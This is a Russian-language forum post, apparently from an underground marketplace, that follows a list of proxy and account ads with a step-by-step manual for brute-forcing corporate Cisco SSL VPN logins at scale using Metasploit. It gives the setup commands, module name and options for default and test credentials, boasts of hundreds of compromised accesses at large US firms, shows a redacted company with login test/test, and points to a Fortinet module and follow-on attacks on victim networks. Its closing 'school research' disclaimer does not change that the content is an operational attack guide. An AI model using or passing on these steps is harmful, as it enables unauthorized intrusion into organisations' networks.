- Proxy - 10$ [Pia, 922, ABC, 9] - https://zelenka.guru/threads/6517233/
- *** Configs - 0.99$ [WireGuard, Outline] - https://zelenka.guru/threads/6751972/
- Proxy - 0.5$ [Socks5, Http(s)] - https://zelenka.guru/threads/6946368/
- *** Services - 0.35$ [AdGuard, Pia, Mullvad..] - https://zelenka.guru/threads/6862450/
- Telegram Premium - 17$ [GIFT] - https://zelenka.guru/threads/6725960/
- Почты - 0.002$ [FirstMail] - https://zelenka.guru/threads/6045558/
@SnegirShop_bot
Всем привет.
Это краткий мануал по работе с корп. сетями, и ****у их ***ов.
Добыча мата.
Первое что нам понадобится это арендованный сервер чем быстрее, тем лучше.
Для удобства работы желательно установить на серв внц или рдп клиент. Как это делать нагуглите сами в крайнем случае спросите у сапорта он вам все установит.
(в кали все установлено по умолчанию), поэтому рекоменудю покупать дедик\впс сразу с кали, если есть такая возможность.
Врываемся в наш арендованный сервер
После врыва и установки всего что нам нужно, открываем консоль и пишем -
systemctl start postgresql
msfdb init
msfconsole
Жмем enter.
Мы запустили metasploit, наверняка все про него наслышаны уже много много раз, и что это, и для чего обьяснять смысла нету
Далее прописываем по списку
Для ****а Cisco SSL *** прописываем -
use auxiliary/scanner/http/cisco_ssl_***
set USERNAME берем рандомное часто встречающееся имя пользователя
set PASSWORD указываем пароль
set PASS_FILE указываем путь до файлика с дефолт паролями не более 3 штук
set PASS_FILE – используем только в том случае если хотите меньше тратить
времени на перезаходы на сервак для установки других параметров
set THREADS 10
set RHOSTS file: тут указываем файлик с ипами Cisco SSL ***
пишем exploit, тычем ентер и забываем за сервак дня так на
3 после завершения сканирования вводим команду сreds
Сканирование не начинается сразу, а только через 30-50 мин
Для того что бы показать в статье, как это работает, я понял что можно дать премию сисадминам огромных корпораций, ибо они оставили не закрытыми тестовые сети ***ов:peka:
Только по test – test у меня насканило 400 доступов по другим меньше
форти *** пока не тестил но боюсь представить сколько выхлопа будет.
auxiliary/scanner/http/fortinet_ssl_***
модуль для форти, можете затестить его.
Думаю, там сами разберетесь принцип тот же
Итак, что мы имеем.
Благодаря тупости сисадминов и оставленным дефолтным паролям, и тестовым учетным записям после чека всего материала статистика выглядит следующим образом:
Всего айпи в скане: 300 000
Открытые миллиардники USA: 15 шт
Конторы от 50кк до 700кк : 230 шт
Конторы с меньшей ревой либо не интересные госы итд: 155
Конторка : ************
Логин: test
Пароль: test
Далее использовать эти данные можно будет как и для условных атак на их сети имея в своём распоряжении уязвимости их сетей, или же просто для чека фортика(но статья не про это, отрабики и те кто хочет получить фри ***чик оаоаоа можете не читать)
Всем удачи, всем пока.
Всё написанное здесь, опубликовано только в исследовательских целях для проекта по теме "Интернет, и цифровая безопасность" за 11 класс. Автор статьи не пропогандирует ничего противозаконного, и не использовал это в корыстных целях.
Загрузка...
Скопировать BBCode